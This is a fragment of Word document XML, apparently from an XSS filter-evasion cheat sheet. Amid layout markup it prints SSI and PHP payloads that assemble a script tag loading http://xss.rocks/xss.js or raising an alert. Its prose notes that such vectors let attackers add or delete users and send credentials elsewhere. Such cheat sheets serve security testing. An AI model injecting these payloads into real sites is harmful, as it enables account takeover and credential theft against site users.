                <wp:wrapTopAndBottom/>
                <wp:docPr id="650" name="Group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2850" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="7910" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="651" name="Freeform 653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7910" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9503 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7910"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7910"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7910"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7910"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7910"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7910"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7910"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9503 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7910"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9524 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7910"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9524 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7910"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9506 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7910"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9503 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7910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10" h="183">
                                <a:moveTo>
                                  <a:pt x="788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889" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7910" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7910" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7892" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="788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Text Box 652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791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&lt;!--#exec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cmd="/bin/echo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'&lt;SCR'"--&gt;&lt;!--#exec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cmd="/bin/echo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0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'IPT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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId46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http://xss.rocks/xss.js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1" o:spid="_x0000_s1779" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:395.5pt;height:9.15pt;z-index:-15596544;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="791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">
                <v:shape id="Freeform 653" o:spid="_x0000_s1780" style="position:absolute;left:1614;top:165;width:7910;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="791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WFsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb80mBYPErFIUaQUh1LaCt0f2&#10;mcRm36bZVdN/3y0IPQ4z8w2TLwfTiiv1rrGsIIliEMSl1Q1XCj7eN48zEM4ja2wtk4IfcrBcjB5y&#10;zLS98Rtd974SAcIuQwW1910mpStrMugi2xEH72R7gz7IvpK6x1uAm1Y+xXEqDTYcFmrsaFVT+bW/&#10;GAWb3fTlfP7+PLjj2s+KbYGNS1CpyXh4noPwNPj/8L39qhWk0wT+zoQj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iWFsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m7889,182l21,182r-3,-1l,161r,-4l,21,21,,7889,r21,21l7910,161r-18,20l7889,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7889,348;21,348;18,347;0,327;0,323;0,187;21,166;7889,166;7910,187;7910,327;7892,347;7889,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 652" o:spid="_x0000_s1781" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:791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mIe8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vR9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WYh7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&lt;!--#exec</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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cmd="/bin/echo</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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'&lt;SCR'"--&gt;&lt;!--#exec</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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cmd="/bin/echo</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="50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'IPT</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId47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http://xss.rocks/xss.js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8"/>
        <w:rPr>
          <w:sz w:val="4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795020" cy="116205"/>
                <wp:effectExtent l="5715" t="4445" r="0" b="3175"/>
                <wp:docPr id="647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5020" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="648" name="Freeform 65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52" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 1230 w 1252"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 1252"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 1252"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 1252"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 1252"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 1252"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 1252"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 1230 w 1252"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 1251 w 1252"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 1251 w 1252"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 1233 w 1252"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 1230 w 1252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252" h="183">
                                <a:moveTo>
                                  <a:pt x="123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230" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1251" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1251" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1233" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 6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&lt;/SCRIPT&gt;'"--&gt;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48" o:spid="_x0000_s1782" style="width:62.6pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="125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">
                <v:shape id="Freeform 650" o:spid="_x0000_s1783" style="position:absolute;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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78vsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdD/gP4QruxlQdilTTooJgV8P42F+ba1tt&#10;bmoTtf79ZDEwy8N5L7PeNOJJnastK5iMIxDEhdU1lwqOh+3nHITzyBoby6TgTQ6ydPCxxETbF//Q&#10;c+9LEULYJaig8r5NpHRFRQbd2LbEgbvYzqAPsCul7vAVwk0jp1EUS4M1h4YKW9pUVNz2D6NgFvcn&#10;t9WX79M5373rtckn92uu1GjYrxYgPPX+X/zn3mkF8VdYG86EIyDT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O/L7BAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1230,182l21,182r-3,l,161r,-3l,21,21,,1230,r21,21l1251,161r-18,21l1230,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1230,182;21,182;18,182;0,161;0,158;0,21;21,0;1230,0;1251,21;1251,161;1233,182;1230,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 649" o:spid="_x0000_s1784" type="#_x0000_t202" style="position:absolute;width:125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M18UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjlFBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1gvRt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JIzX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&lt;/SCRIPT&gt;'"--&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>PHP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before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="429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2096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421005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="644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386080"/>
                          <a:chOff x="1614" y="663"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="645" name="Freeform 647"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="663"/>
                            <a:ext cx="8700" cy="608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1271 663"/>
                              <a:gd name="T3" fmla="*/ 1271 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1271 663"/>
                              <a:gd name="T7" fmla="*/ 1271 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1270 663"/>
                              <a:gd name="T11" fmla="*/ 1270 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1250 663"/>
                              <a:gd name="T15" fmla="*/ 1250 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1247 663"/>
                              <a:gd name="T19" fmla="*/ 1247 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 684 663"/>
                              <a:gd name="T23" fmla="*/ 684 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 663 663"/>
                              <a:gd name="T27" fmla="*/ 663 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 663 663"/>
                              <a:gd name="T31" fmla="*/ 663 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 684 663"/>
                              <a:gd name="T35" fmla="*/ 684 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1250 663"/>
                              <a:gd name="T39" fmla="*/ 1250 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1270 663"/>
                              <a:gd name="T43" fmla="*/ 1270 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1271 663"/>
                              <a:gd name="T47" fmla="*/ 1271 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="608"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="584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587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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Text Box 64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663"/>
                            <a:ext cx="8700" cy="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spacing w:line="312" w:lineRule="auto"/>
                                <w:ind w:left="165" w:right="4343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DA1357"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve">&lt;? </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>echo</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console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sz w:val="15"/>
                                </w:rPr>
                                <w:t>'&lt;SCR)'</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>;</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console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F6EC6"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>echo</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:w w:val="90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w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>'IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>);</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="7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DA1357"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>?&gt;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5" o:spid="_x0000_s1785" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:33.15pt;width:435pt;height:30.4pt;z-index:-15595520;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,663" coordsize="8700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">
                <v:shape id="Freeform 647" o:spid="_x0000_s1786" style="position:absolute;left:1614;top:663;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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3HrcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3hCL6VmLe1WVqOIIIgg6LYXb4/N&#10;c7Ps5iVsUt3+e1MQehxm5htmsRpsJ67Uh8axgukkA0FcOd1wreD7a/s6AxEissbOMSn4pQCr5ehp&#10;gYV2Nz7RtYy1SBAOBSowMfpCylAZshgmzhMn7+J6izHJvpa6x1uC206+ZVkuLTacFgx62hiq2vLH&#10;KhgOZrt7Oe8vpzb3rvx0x5b9Uann8bCeg4g0xP/wo73TCvL3D/g7k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fcetxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8679,608l21,608r-3,-1l,587r,-3l,21,21,,8679,r21,21l8700,587r-18,20l8679,608xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1271;21,1271;18,1270;0,1250;0,1247;0,684;21,663;8679,663;8700,684;8700,1250;8682,1270;8679,1271" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 646" o:spid="_x0000_s1787" type="#_x0000_t202" style="position:absolute;left:1614;top:663;width:8700;height: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sYpcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IK3nRTkaCpq0hRKAjSmB56fM0+&#10;k8Xs25jdavz3bkHwOMzMN8xi1dtGXKjzxrGCt3ECgrh02nCl4LvYjmYgfEDW2DgmBTfysFq+DBaY&#10;aXflnC6HUIkIYZ+hgjqENpPSlzVZ9GPXEkfv6DqLIcqukrrDa4TbRk6SJJUWDceFGlv6qKk8Hf6s&#10;gvUP5xtz3v9+5cfcFMU84V16Umr42q/fQQTqwzP8aH9qBek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7GKXEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=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spacing w:line="312" w:lineRule="auto"/>
                          <w:ind w:left="165" w:right="4343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DA1357"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">&lt;? </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>echo</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>(</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>'&lt;SCR)'</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console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F6EC6"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>echo</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>(</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>'IPT&gt;alert("XSS")&lt;/SCRIPT&gt;'</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>);</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="7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DA1357"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>?&gt;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Requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>PHP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installed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server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vector.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Again,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>remotely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>this,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36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probably</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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dire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>issues:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="124"/>
      </w:pPr>
      <w:r>
        <w:t>IMG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Commands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tabs>
          <w:tab w:val="left" w:leader="dot" w:pos="6253"/>
        </w:tabs>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="240"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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webpage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>where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injected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(like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web-board)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behind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>protection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password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works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commands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9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>domain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>users,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>visits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page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administrator),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>elsewhere,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w: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lesser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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but</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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2147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4652645" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="641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52645" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="7327" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
